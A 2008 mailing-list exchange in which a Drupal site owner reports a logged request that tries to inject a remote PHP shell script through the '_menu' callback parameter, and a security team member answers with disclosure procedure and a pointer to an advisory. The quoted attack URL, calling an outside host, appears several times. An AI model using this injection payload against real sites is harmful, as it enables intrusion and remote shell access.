Hi, I have see this url into my watchdog logs:
drupal/?_menu[callbacks][1][callback]=http://my3dwork.com/images/on.txt? http://www.ziobudda.net/rilasciato_drupal_6_beta1/drupal/?_menu%5Bcallbacks%5D%5B1%5D%5Bcallback%5D=http://my3dwork.com/images/on.txt?
where http://my3dwork.com/images/on.txt http://www.ziobudda.net/rilasciato_drupal_6_beta1/drupal/?_menu%5Bcallbacks%5D%5B1%5D%5Bcallback%5D=http://my3dwork.com/images/on.txt? is a php shell script.
any 0-day bug ?
I have tried to exec it on my site without "drupal/" and the result is that the browser is redirect to the homepage.
M.
Hi,
The most important thing here is that when you have a potential security issue the proper way to submit it is documented on http://drupal.org/security-team which can also be found via http://drupal.org/security If you send the potential exploit to a public channel like a listserve or the Drupal.org issue queue, then that makes the job of the security team and all other Drupal users much harder because everyone has to scramble to find a fix and get it installed as soon as possible.
On Jan 6, 2008 6:17 PM, michel michel@ziobudda.net wrote:
drupal/?_menu[callbacks][1][callback]=http://my3dwork.com/images/on.txt?
where http://my3dwork.com/images/on.txt is a php shell script.
any 0-day bug ?
This is not a bug in Drupal per se, but rather a PHP bug. Because the Security Team was seeing a few reports of logs like this we decided to make a "Public Service Announcement" back in October - http://drupal.org/node/184313 That announcement describes the nature of the problem and the proper actions to take to prevent the attack from succeeding on your site.
Regards, Greg
-
Greg Knaddison -
michel